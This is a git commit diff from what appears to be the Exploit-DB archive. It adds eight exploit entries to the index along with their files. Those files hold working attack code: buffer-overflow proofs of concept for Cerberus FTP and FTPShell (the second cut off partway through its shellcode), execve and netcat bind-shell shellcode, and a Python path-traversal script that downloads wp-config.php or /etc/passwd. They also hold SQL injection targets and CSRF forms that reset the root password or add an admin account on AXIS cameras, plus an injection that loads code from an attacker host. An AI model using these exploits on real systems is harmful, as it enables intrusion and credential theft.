DB: 2017-03-18
8 new exploits Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow FTPShell Client 6.53 - Local Buffer Overflow Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes) Linux/x86 - Bind Shell Shellcode (51 bytes) Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download AXIS Communications - Cross-Site Scripting / Content Injection AXIS Multiple Products - Cross-Site Request Forgery Departmental Store Management System 1.2 - SQL Injection
This commit is contained in:
parent
5b8d706b7d
commit
4da96605a4
9 changed files with 661 additions and 0 deletions
|
@ -5397,7 +5397,9 @@ id,file,description,date,author,platform,type,port
|
|||
41611,platforms/multiple/dos/41611.txt,"Adobe Flash - ATF Planar Decompression Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||
41612,platforms/multiple/dos/41612.txt,"Adobe Flash - AVC Header Slicing Heap Overflow",2017-03-15,"Google Security Research",multiple,dos,0
|
||||
41615,platforms/windows/dos/41615.txt,"Microsoft Windows - 'LoadUvsTable()' Heap-based Buffer Overflow",2017-03-15,"Hossein Lotfi",windows,dos,0
|
||||
41620,platforms/windows/dos/41620.txt,"Cerberus FTP Server 8.0.10.3 - 'MLST' Buffer Overflow",2017-03-16,"Nassim Asrir",windows,dos,0
|
||||
41623,platforms/windows/dos/41623.html,"Microsoft Edge 38.14393.0.0 - JavaScript Engine Use-After-Free",2017-03-16,"Google Security Research",windows,dos,0
|
||||
41629,platforms/windows/dos/41629.py,"FTPShell Client 6.53 - Local Buffer Overflow",2017-03-17,ScrR1pTK1dd13,windows,dos,0
|
||||
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x / 2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
|
||||
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
|
||||
12,platforms/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,linux,local,0
|
||||
|
@ -15956,6 +15958,8 @@ id,file,description,date,author,platform,type,port
|
|||
41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - NetCat Reverse Shell Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Polymorphic NetCat Reverse Shell Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0
|
||||
41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0
|
||||
41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - Encoded exceve(_/bin/sh_) Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0
|
||||
41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind Shell Shellcode (51 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0
|
||||
6,platforms/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,php,webapps,0
|
||||
44,platforms/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",php,webapps,0
|
||||
47,platforms/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,php,webapps,0
|
||||
|
@ -37534,3 +37538,7 @@ id,file,description,date,author,platform,type,port
|
|||
41616,platforms/ruby/webapps/41616.rb,"GitHub Enterprise 2.8.0 < 2.8.6 - Remote Code Execution",2017-03-15,iblue,ruby,webapps,0
|
||||
41617,platforms/php/webapps/41617.txt,"Steam Profile Integration 2.0.11 - SQL injection",2017-03-13,DrWhat,php,webapps,0
|
||||
41618,platforms/aspx/webapps/41618.txt,"Sitecore CMS 8.1 Update-3 - Cross-Site Scripting",2017-03-15,"Pralhad Chaskar",aspx,webapps,0
|
||||
41622,platforms/php/webapps/41622.py,"Wordpress Plugin Membership Simplified 1.58 - Arbitrary File Download",2017-03-16,"The Martian",php,webapps,0
|
||||
41625,platforms/hardware/webapps/41625.txt,"AXIS Communications - Cross-Site Scripting / Content Injection",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||
41626,platforms/hardware/webapps/41626.txt,"AXIS Multiple Products - Cross-Site Request Forgery",2017-03-17,Orwelllabs,hardware,webapps,0
|
||||
41627,platforms/php/webapps/41627.txt,"Departmental Store Management System 1.2 - SQL Injection",2017-03-17,"Ihsan Sencan",php,webapps,0
|
||||
|
|
Can't render this file because it is too large.
|
229
platforms/hardware/webapps/41625.txt
Executable file
229
platforms/hardware/webapps/41625.txt
Executable file
|
@ -0,0 +1,229 @@
|
|||
0RWELLL4BS
|
||||
**********
|
||||
security advisory
|
||||
olsa-2015-8258
|
||||
PGP: 79A6CCC0
|
||||
@orwelllabs
|
||||
|
||||
|
||||
|
||||
|
||||
Advisory Information
|
||||
====================
|
||||
- Title: ImagePath Resource Injection/Open script editor
|
||||
- Vendor: AXIS Communications
|
||||
- Research and Advisory: Orwelllabs
|
||||
- Class: Improper Input Validation [CWE-20]
|
||||
- CVE Name: CVE-2015-8258
|
||||
- Affected Versions: Firmwares versions <lt 5.80.x
|
||||
- IoT Attack Surface: Device Administrative Interface/Authentication/Autho
|
||||
rization
|
||||
- OWASP IoTTop10: I1, I2
|
||||
|
||||
|
||||
|
||||
Technical Details
|
||||
=================
|
||||
The variable "imagePath=" (that is prone to XSS in a large range of
|
||||
products) also can be used to resource injection intents. If inserted a URL
|
||||
in this variable will be made an GET request to this URL, so this an
|
||||
interesting point to request malicious codes from the attacker machine, and
|
||||
of course, the possibilities are vast (including hook the browser).
|
||||
|
||||
|
||||
An attacker sends the following URL for the current Web user interface of
|
||||
the camera:
|
||||
http://{AXISVULNHOST}/view.shtml?imagepath=http://www.3vilh0
|
||||
st.com/evilcode.html
|
||||
|
||||
This request will be processed normally and will return the status code 200
|
||||
(OK):
|
||||
|
||||
[REQUEST]
|
||||
|
||||
GET /view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html HTTP/1.1
|
||||
Host: {axisvulnhost}
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
|
||||
Firefox/41.0
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Authorization: Digest username="Winst0n", realm="AXIS_XXXXXXXXXXX",
|
||||
nonce="00978cY6s4g@Sadd1b11a9A6ed955e1b5ce9eb",
|
||||
uri="/view.shtml?imagepath=http://www.3vilh0st.com/evilcode.html",
|
||||
response="5xxxxxxxxxxxxxxxxxxxxxx", qop=auth,
|
||||
nc=0000002b, cnonce="00rw3ll4bs0rw3lll4bs"
|
||||
Connection: keep-alive
|
||||
|
||||
|
||||
GET /evilcode.html HTTP/1.1
|
||||
Host: www.3vilh0st.com
|
||||
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:41.0) Gecko/20100101
|
||||
Firefox/41.0
|
||||
Accept: image/png,image/*;q=0.8,*/*;q=0.5
|
||||
Accept-Language: pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3
|
||||
Accept-Encoding: gzip, deflate
|
||||
Referer: http://{axisvulnhost}/view.shtml?imagepath=http://www.3vilh0
|
||||
st.com/evilcode.html
|
||||
Connection: keep-alive
|
||||
|
||||
The server response can be seen below (with the clipping of the affected
|
||||
HTML code snippets - just look for "http://www.3vilh0st.com/evilcode.html"):
|
||||
|
||||
|
||||
<table border="0" cellpadding="3" cellspacing="3">
|
||||
<tr>
|
||||
<td id="videoStreamTable">
|
||||
<script language="JavaScript">
|
||||
<!--
|
||||
video('http://www.3vilh0st.com/evilcode.html');
|
||||
// -->
|
||||
</script>
|
||||
</td>
|
||||
</tr>
|
||||
</table>
|
||||
|
||||
[..SNIP..]
|
||||
|
||||
function listVideoSources()
|
||||
{
|
||||
var formInt = document.listFormInt;
|
||||
var formExt = document.listFormExt;
|
||||
var formCrop = document.listFormCrop;
|
||||
var presetForm = document.listFormPreset;
|
||||
var form = document.WizardForm
|
||||
var currentPath = 'http://www.3vilh0st.com/evilcode.html';
|
||||
var imageSource;
|
||||
|
||||
[..SNIP..]
|
||||
|
||||
var reload = false;
|
||||
reload |= (other != null && other.search("seq=yes") >= 0);
|
||||
reload |= (other != null && other.search("streamprofile=") >= 0);
|
||||
reload |= ((other == null || (other != null && other.search("streamprofile=
|
||||
;)(r") == -1)) && ('' != ""));
|
||||
reload |= (imagePath != 'http://www.3vilh0st.com/evilcode.html');
|
||||
|
||||
[..SNIP..]
|
||||
|
||||
<script SRC="/incl/activeX.js?id=69"></script>
|
||||
</head>
|
||||
<body class="bodyBg" topmargin="0" leftmargin="15" marginwidth="0"
|
||||
marginheight="0" onLoad="DrawTB('no', 'http://www.3vilh0st.com/evilcode.html',
|
||||
'1', '0', 'no', 'no', 'true', getStreamProfileNbr());" onResize="">
|
||||
<script language="JavaScript">
|
||||
|
||||
[..SNIP..]
|
||||
|
||||
// Draw the scale buttons
|
||||
var currentResolution = 0
|
||||
var width = 0
|
||||
var height = 0
|
||||
var imagepath = "http://www.3vilh0st.com/evilcode.html"
|
||||
var resStart = imagepath.indexOf("resolution=")
|
||||
if (resStart != -1) {
|
||||
var resStop = imagepath.indexOf("&", resStart)
|
||||
|
||||
[..SNIP..]
|
||||
|
||||
|
||||
=================== view.shtml snips =====================
|
||||
|
||||
447 function zoom(size)
|
||||
448 {
|
||||
449 var url = document.URL;
|
||||
450
|
||||
451 if (url.indexOf("?") == -1) {
|
||||
452 url += "F?size=" + size
|
||||
453 } else if (url.indexOf("size=") == -1) {
|
||||
454 url += "&size=" + size
|
||||
455 } else {
|
||||
456 var searchStr = "size=<!--#echo var="size"
|
||||
option="encoding:javascript" -->"
|
||||
457 var replaceStr = "size=" + size
|
||||
458 var re = new RegExp(searchStr , "g")
|
||||
459 url = url.replace(re, replaceStr)
|
||||
460 }
|
||||
461
|
||||
462 document.location = url;
|
||||
463 }
|
||||
464
|
||||
465 var aNewImagePath;
|
||||
466
|
||||
467 function reloadPage()
|
||||
468 {
|
||||
469 document.location = aNewImagePath;
|
||||
470 }
|
||||
471
|
||||
|
||||
[ SNIP ]
|
||||
|
||||
567 aNewImagePath = '/view/view.shtml?id=<!--#echo
|
||||
var="ssi_request_id" option="encoding:url" -->&imagePath=' +
|
||||
escape(imagePath) + size;
|
||||
568 if (other != null)
|
||||
569 aNewImagePath += other;
|
||||
570 <!--#if expr="$ptzpresets = yes" -->
|
||||
571 /* append preset parameters so that preset postion is selected in
|
||||
drop down list after reload */
|
||||
572 if (presetName != '')
|
||||
573 aNewImagePath += "&gotopresetname=" + escape(presetName);
|
||||
574 else if (gotopresetname != '')
|
||||
575 aNewImagePath += "&gotopresetname=" + escape(gotopresetname);
|
||||
576
|
||||
577 if( newCamera != '')
|
||||
578 aNewImagePath += "&camera=" + escape(newCamera);
|
||||
|
||||
|
||||
|
||||
---*---
|
||||
Some legitimate resources can be very interesting to cybercriminals with
|
||||
your hansowares/botnets/bitcoinminer/backdoors/malwares etc. In this case
|
||||
there are some resources, like the "Open Script Editor". By this resource
|
||||
the user can edit any file in the operation system with root privileges,
|
||||
because everything (in the most part of IoT devices) runs with root
|
||||
privileges, this is other dangerous point to keep in mind.
|
||||
|
||||
> Open Script Editor path: 'System Options' -> 'Advanced' -> 'Scripting'
|
||||
|
||||
Well, one can say that this feature is restricted to the administrator of
|
||||
the camera, and this would be true if customers were forced to change the
|
||||
default password during setup phase with a strong password policy, since
|
||||
change "pass" to "pass123" does not solve the problem. The aggravating
|
||||
factor is that there are thousands of products available on the internet,
|
||||
running with default credentials.
|
||||
|
||||
|
||||
Vendor Information, Solutions and Workarounds
|
||||
+++++++++++++++++++++++++++++++++++++++++++++
|
||||
According to the manufacturer, the resource injection vulnerability was
|
||||
fixed in firmware 5.60, but we identified that the problem still occurred
|
||||
in 5.80.x versions of various product models. Check for updates on the
|
||||
manufacturer's website.
|
||||
|
||||
About Open Script Editor,It was considered that in order to have access to
|
||||
this feature, it is necessary to be authenticated as an admin, but if there
|
||||
is no policy that forces the client to change the password during the
|
||||
product setup (ease vs. security) and also requires a password complexity,
|
||||
having an administrative credential to abuse the functionality is not
|
||||
exactly an impediment (e.g: botnets that bring embedded in the code a
|
||||
relation of default credentials for that type of device)
|
||||
|
||||
|
||||
Credits
|
||||
=======
|
||||
These vulnerabilities has been discovered and published by Orwelllabs.
|
||||
|
||||
|
||||
Legal Notices
|
||||
=============
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise. We accept no
|
||||
responsibility for any damage caused by the use or misuse of this
|
||||
information.
|
||||
|
||||
|
||||
About Orwelllabs
|
||||
================
|
||||
https://www.exploit-db.com/author/?a=8225
|
||||
https://packetstormsecurity.com/files/author/12322/
|
103
platforms/hardware/webapps/41626.txt
Executable file
103
platforms/hardware/webapps/41626.txt
Executable file
|
@ -0,0 +1,103 @@
|
|||
0RWELLL4BS
|
||||
**********
|
||||
security advisory
|
||||
olsa-CVE-2015-8255
|
||||
PGP: 79A6CCC0
|
||||
@orwelllabs
|
||||
|
||||
|
||||
|
||||
|
||||
Advisory Information
|
||||
====================
|
||||
- Title: Cross-Site Request Forgery
|
||||
- Vendor: AXIS Communications
|
||||
- Research and Advisory: Orwelllabs
|
||||
- Class: Session Management control [CWE-352]
|
||||
- CVE Name: CVE-2015-8255
|
||||
- Affected Versions:
|
||||
- IoT Attack Surface: Device Web Interface
|
||||
- OWASP IoTTop10: I1
|
||||
|
||||
|
||||
|
||||
Technical Details
|
||||
=================
|
||||
Because of the own (bad) design of this kind of device (Actualy a big
|
||||
problem of IoT, one of them)
|
||||
The embedded web application does not verify whether a valid request was
|
||||
intentionally provided by the user who submitted the request.
|
||||
|
||||
|
||||
|
||||
PoCs
|
||||
====
|
||||
#-> Setting root password to W!nst0n
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC Orwelllabs -->
|
||||
<body>
|
||||
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
|
||||
<input type="hidden" name="action" value="update" />
|
||||
<input type="hidden" name="user" value="root" />
|
||||
<input type="hidden" name="pwd" value="w!nst0n" />
|
||||
<input type="hidden" name="comment" value="Administrator" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
#-> Adding new credential SmithW:W!nst0n
|
||||
|
||||
<html>
|
||||
<!-- CSRF PoC - Orwelllabs -->
|
||||
<body>
|
||||
<form action="http://xxx.xxx.xxx.xxx/axis-cgi/admin/pwdgrp.cgi">
|
||||
<input type="hidden" name="action" value="add" />
|
||||
<input type="hidden" name="user" value="SmithW" />
|
||||
<input type="hidden" name="sgrp"
|
||||
value="viewer:operator:admin:ptz" />
|
||||
<input type="hidden" name="pwd" value="W!nst0n" />
|
||||
<input type="hidden" name="grp" value="users" />
|
||||
<input type="hidden" name="comment" value="WebUser" />
|
||||
<input type="submit" value="Submit request" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
#-> Deleting an app via directly CSRF (axis_update.shtml)
|
||||
|
||||
http://xxx.xxx.xxx.xxx/axis-cgi/vaconfig.cgi?action=get&name=<script src="
|
||||
http://xxx.xxx.xxx.xxx/axis-cgi/admin/local_del.cgi?+/usr/html/local/viewer/axis_update.shtml
|
||||
"></script>
|
||||
|
||||
|
||||
[And many acitions allowed to an user [all of them?] can be forged in this
|
||||
way]
|
||||
|
||||
|
||||
Vendor Information, Solutions and Workarounds
|
||||
+++++++++++++++++++++++++++++++++++++++++++++
|
||||
Well, this is a very old design problem of this kind of device, nothing new
|
||||
to say about that.
|
||||
|
||||
|
||||
Credits
|
||||
=======
|
||||
These vulnerabilities has been discovered and published by Orwelllabs.
|
||||
|
||||
|
||||
Legal Notices
|
||||
=============
|
||||
The information contained within this advisory is supplied "as-is" with no
|
||||
warranties or guarantees of fitness of use or otherwise. We accept no
|
||||
responsibility for any damage caused by the use or misuse of this
|
||||
information.
|
||||
|
||||
|
||||
About Orwelllabs
|
||||
================
|
||||
https://www.exploit-db.com/author/?a=8225
|
||||
https://packetstormsecurity.com/files/author/12322/
|
84
platforms/lin_x86/shellcode/41630.asm
Executable file
84
platforms/lin_x86/shellcode/41630.asm
Executable file
|
@ -0,0 +1,84 @@
|
|||
;================================================================================
|
||||
; The MIT License
|
||||
;
|
||||
; Copyright (c) <year> <copyright holders>
|
||||
;
|
||||
; Permission is hereby granted, free of charge, to any person obtaining a copy
|
||||
; of this software and associated documentation files (the "Software"), to deal
|
||||
; in the Software without restriction, including without limitation the rights
|
||||
; to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
|
||||
; copies of the Software, and to permit persons to whom the Software is
|
||||
; furnished to do so, subject to the following conditions:
|
||||
;
|
||||
; The above copyright notice and this permission notice shall be included in
|
||||
; all copies or substantial portions of the Software.
|
||||
;
|
||||
; THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
|
||||
; IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
|
||||
; FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
|
||||
; AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
|
||||
; LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
|
||||
; OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
|
||||
; THE SOFTWARE.
|
||||
;================================================================================
|
||||
; Name : Encrypt Linux x86 Shellcode(44 Bytes) To exceve("/bin/sh")
|
||||
; Author : WangYihang
|
||||
; Email : wangyihanger@gmail.com
|
||||
; Tested on: Linux_x86
|
||||
; Shellcode Length: 44
|
||||
;================================================================================
|
||||
; Shellcode :
|
||||
; char shellcode[] = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a"
|
||||
; "\x06\x34\xe9\x88\x06\x46\xe2\xf7"
|
||||
; "\xeb\x05\xe8\xeb\xff\xff\xff\xd8"
|
||||
; "\x20\xb8\x81\xc6\xc6\x9a\x81\x81"
|
||||
; "\xc6\x8b\x80\x87\x60\x0a\x83\xe2"
|
||||
; "\xb1\x70\x24\x69";
|
||||
;================================================================================
|
||||
; Python :
|
||||
; shellcode = "\xeb\x10\x5e\x31\xc9\xb1\x15\x8a\x06\x34\xe9\x88\x06\x46\xe2\xf7\xeb\x05\xe8\xeb\xff\xff\xff\xd8\x20\xb8\x81\xc6\xc6\x9a\x81\x81\xc6\x8b\x80\x87\x60\x0a\x83\xe2\xb1\x70\x24\x69"
|
||||
;================================================================================
|
||||
; Assembly language code :
|
||||
|
||||
global _start
|
||||
; this shell code will xor every byte of 'jocker' segment , then execute them
|
||||
; password is 0xe9 (233)
|
||||
_start:
|
||||
jmp jocker
|
||||
loader:
|
||||
pop esi ; get address of encrypted shellcode
|
||||
xor ecx, ecx
|
||||
mov cl, 21 ; loop times (length of encrypt shellcode)
|
||||
decrypt:
|
||||
mov al, [esi]
|
||||
xor al, 0e9H
|
||||
mov [esi], al
|
||||
inc esi
|
||||
loop decrypt
|
||||
jmp encrypt
|
||||
|
||||
jocker:
|
||||
call loader
|
||||
encrypt:
|
||||
db 0d8H
|
||||
db 20H
|
||||
db 0b8H
|
||||
db 81H
|
||||
db 0c6H
|
||||
db 0c6H
|
||||
db 9aH
|
||||
db 81H
|
||||
db 81H
|
||||
db 0c6H
|
||||
db 8bH
|
||||
db 80H
|
||||
db 87H
|
||||
db 60H
|
||||
db 0aH
|
||||
db 83H
|
||||
db 0e2H
|
||||
db 0b1H
|
||||
db 70H
|
||||
db 24H
|
||||
db 69H
|
||||
;================================================================================
|
49
platforms/lin_x86/shellcode/41631.c
Executable file
49
platforms/lin_x86/shellcode/41631.c
Executable file
|
@ -0,0 +1,49 @@
|
|||
/*
|
||||
# Super_Small_Bind_Shell (x86)
|
||||
# Date: 17.03.2017
|
||||
# This shellcode will listen on port 37 and show you how deep the rabbit hole goes
|
||||
# Please note that 37 port is below 1024 and thus privileged!
|
||||
# Shellcode Author: ALEH BOITSAU
|
||||
# Shellcode Length: 51 bytes ;)
|
||||
# Tested on: Debian GNU/Linux 8/x86_64
|
||||
# Command: gcc -m32 -z execstack super_small_bind_shell.c -o super_small_bind_shell
|
||||
|
||||
global _start
|
||||
section .text
|
||||
_start:
|
||||
xor eax, eax
|
||||
push eax
|
||||
push 0x3733702d ;-p37
|
||||
mov esi, esp
|
||||
|
||||
push eax
|
||||
push 0x68732f2f ;-le//bin//sh
|
||||
push 0x6e69622f
|
||||
push 0x2f656c2d
|
||||
mov edi, esp
|
||||
|
||||
push eax
|
||||
push 0x636e2f2f ;/bin//nc
|
||||
push 0x6e69622f
|
||||
mov ebx, esp
|
||||
|
||||
push eax
|
||||
push esi
|
||||
push edi
|
||||
push ebx
|
||||
mov ecx, esp
|
||||
mov al,11
|
||||
int 0x80
|
||||
*/
|
||||
|
||||
#include <stdio.h>
|
||||
#include <string.h>
|
||||
|
||||
unsigned char shellcode[] =
|
||||
"\x31\xc0\x50\x68\x2d\x70\x33\x37\x89\xe6\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x68\x2d\x6c\x65\x2f\x89\xe7\x50\x68\x2f\x2f\x6e\x63\x68\x2f\x62\x69\x6e\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80";
|
||||
main()
|
||||
{
|
||||
printf("Shellcode Length: %d\n",strlen(shellcode));
|
||||
int (*ret)() = (int(*)())shellcode;
|
||||
ret();
|
||||
}
|
60
platforms/php/webapps/41622.py
Executable file
60
platforms/php/webapps/41622.py
Executable file
|
@ -0,0 +1,60 @@
|
|||
import requests
|
||||
import string
|
||||
import random
|
||||
from urlparse import urlparse
|
||||
|
||||
print "---------------------------------------------------------------------"
|
||||
print "Wordpress Plugin Membership Simplified v1.58 - Arbitrary File Download\nDiscovery: Larry W. Cashdollar\nExploit Author: Munir Njiru\nWebsite: https://www.alien-within.com\nCVE-2017-1002008\nCWE: 23\n\nReference URLs:\nhttp://www.vapidlabs.com/advisory.php?v=187"
|
||||
print "---------------------------------------------------------------------"
|
||||
victim = raw_input("Please Enter victim host e.g. http://example.com: ")
|
||||
file_choice=raw_input ("\n Please choose a number representing the file to attack: \n1. Wordpress Config \n2. Linux Passwd File\n")
|
||||
if file_choice == "1":
|
||||
payload="..././..././..././wp-config.php"
|
||||
elif file_choice == "2":
|
||||
payload="..././..././..././..././..././..././..././..././etc/passwd"
|
||||
else:
|
||||
print "Invalid Download choice, Please choose 1 or 2; Alternatively you can re-code me toI will now exit"
|
||||
quit()
|
||||
slug = "/wp-content/plugins/membership-simplified-for-oap-members-only/download.php?download_file="+payload
|
||||
target=victim+slug
|
||||
def randomizeFile(size=6, chars=string.ascii_uppercase + string.digits):
|
||||
return ''.join(random.choice(chars) for _ in range(size))
|
||||
|
||||
def checkPlugin():
|
||||
pluginExists = requests.get(victim+"/wp-content/plugins/membership-simplified-for-oap-members-only/download.php")
|
||||
pluginExistence = pluginExists.status_code
|
||||
if pluginExistence == 200:
|
||||
print "\nI can reach the target & it seems vulnerable, I will attempt the exploit\nRunning exploit..."
|
||||
exploit()
|
||||
else:
|
||||
print "Target has a funny code & might not be vulnerable, I will now exit\n"
|
||||
quit()
|
||||
|
||||
def exploit():
|
||||
|
||||
getThatFile = requests.get(target)
|
||||
fileState = getThatFile.status_code
|
||||
breakApart=urlparse(victim)
|
||||
extract_hostname=breakApart.netloc
|
||||
randomDifferentiator=randomizeFile()
|
||||
cleanName=str(randomDifferentiator)
|
||||
if fileState == 200:
|
||||
respFromThatFile = getThatFile.text
|
||||
if file_choice == "1":
|
||||
resultFile=extract_hostname+"_config_"+cleanName+".txt"
|
||||
print resultFile
|
||||
pwned=open(resultFile, 'w')
|
||||
pwned.write(respFromThatFile)
|
||||
pwned.close
|
||||
print "Wordpress Config Written to "+resultFile
|
||||
else:
|
||||
resultFile=extract_hostname+"_passwd"+cleanName+".txt"
|
||||
pwned=open(resultFile, 'w')
|
||||
pwned.write(respFromThatFile)
|
||||
pwned.close
|
||||
print "Passwd File Written to "+resultFile
|
||||
else:
|
||||
print "I am not saying it was me but it was me! Something went wrong when I tried to get the file. The server responded with: \n" +fileState
|
||||
|
||||
if __name__ == "__main__":
|
||||
checkPlugin()
|
29
platforms/php/webapps/41627.txt
Executable file
29
platforms/php/webapps/41627.txt
Executable file
|
@ -0,0 +1,29 @@
|
|||
# # # # #
|
||||
# Exploit Title: Pasal - Departmental Store Management System v1.2 - SQL Injection
|
||||
# Google Dork: N/A
|
||||
# Date: 17.03.2017
|
||||
# Vendor Homepage: http://webstarslab.com
|
||||
# Software : http://webstarslab.com/products/pasal-departmental-store-management-system/
|
||||
# Demo: http://webstarslab.com/departmental-store-management-system/store/
|
||||
# Version: 1.2
|
||||
# Tested on: Win7 x64, Kali Linux x64
|
||||
# # # # #
|
||||
# Exploit Author: Ihsan Sencan
|
||||
# Author Web: http://ihsan.net
|
||||
# Author Mail : ihsan[@]ihsan[.]net
|
||||
# # # # #
|
||||
# SQL Injection/Exploit :
|
||||
# Login as regular user
|
||||
# http://localhost/[PATH]/module.php?module=vendors&page=edit-vendors&id=[SQL]
|
||||
# http://localhost/[PATH]/module.php?module=units&page=edit-units&id=[SQL]
|
||||
# http://localhost/[PATH]/module.php?module=currency&page=edit-currency&id=[SQL]
|
||||
# http://localhost/[PATH]/module.php?module=category&page=edit-category&id=[SQL]
|
||||
# http://localhost/[PATH]/module.php?module=purchase&y=[SQL]&m=[SQL]
|
||||
# tbl_users:id
|
||||
# tbl_users:username
|
||||
# tbl_users:password
|
||||
# tbl_users:email
|
||||
# tbl_users:full_name
|
||||
# tbl_users:permission
|
||||
# Etc..
|
||||
# # # # #
|
50
platforms/windows/dos/41620.txt
Executable file
50
platforms/windows/dos/41620.txt
Executable file
|
@ -0,0 +1,50 @@
|
|||
[+] Title: Cerberus FTP Server 8.0.10.3 – 'MLST' Remote Buffer Overflow
|
||||
[+] Credits / Discovery: Nassim Asrir
|
||||
[+] Author Contact: wassline@gmail.com || https://www.linkedin.com/in/nassim-asrir-b73a57122/
|
||||
[+] Author Company: Henceforth
|
||||
[+] CVE: CVE-2017-6880
|
||||
|
||||
Vendor:
|
||||
===============
|
||||
|
||||
https://www.cerberusftp.com/
|
||||
|
||||
|
||||
Download:
|
||||
===========
|
||||
|
||||
https://www.cerberusftp.com/files/CerberusInstall.exe (32-Bit)
|
||||
|
||||
|
||||
Vulnerability Type:
|
||||
===================
|
||||
|
||||
Remote Buffer Overflow.
|
||||
|
||||
|
||||
issue:
|
||||
===================
|
||||
|
||||
This problem happens when the Attacker send the bad char "A" in the command "MLST" (2047).
|
||||
|
||||
POC:
|
||||
===================
|
||||
#Simple POC by Nassim Asrir from Henceforth.
|
||||
import socket
|
||||
bad_char = "A"*2047
|
||||
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
|
||||
connect=s.connect(('192.168.1.81',21))
|
||||
s.recv(1024)
|
||||
s.send('USER nassim\r\n')
|
||||
s.recv(1024)
|
||||
s.send('PASS mypass\r\n')
|
||||
s.recv(1024)
|
||||
s.send('MLST ' + bad_char + '\r\n')
|
||||
s.close()
|
||||
|
||||
https://gist.github.com/Nassim-Asrir/a1bb8479976d4bf6b7c0e63024a46cd6/archive/e76274496bf20a0d3ecbb4b2f6a408166808d03b.zip
|
||||
|
||||
Tested on:
|
||||
===============
|
||||
|
||||
Windows 7 Sp1 (64 Bit)
|
49
platforms/windows/dos/41629.py
Executable file
49
platforms/windows/dos/41629.py
Executable file
|
@ -0,0 +1,49 @@
|
|||
print '''
|
||||
|
||||
##############################################
|
||||
# Created: ScrR1pTK1dd13 #
|
||||
# Name: Greg Priest #
|
||||
# Mail: ScrR1pTK1dd13.slammer@gmail.com #
|
||||
##############################################
|
||||
|
||||
# Exploit Title: FTPShell Client 6.53 Session name BufferOverflow
|
||||
# Date: 2017.03.17
|
||||
# Exploit Author: Greg Priest
|
||||
# Version: FTPShell Client 6.53
|
||||
# Tested on: Windows7 x64 HUN/ENG Professional
|
||||
'''
|
||||
|
||||
|
||||
a = "A" * 460
|
||||
b = '\xDC\xE8\x65\x76'
|
||||
nop = '\x90' * 10
|
||||
c = "C" * 1638
|
||||
|
||||
#calc.exe
|
||||
shellcode =(
|
||||
"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
|
||||
"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
|
||||
"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
|
||||
"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
|
||||
"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
|
||||
"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
|
||||
"\x45\x81\x3e\x43\x72\x65\x61\x75" +
|
||||
"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
|
||||
"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
|
||||
"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
|
||||
"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
|
||||
"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
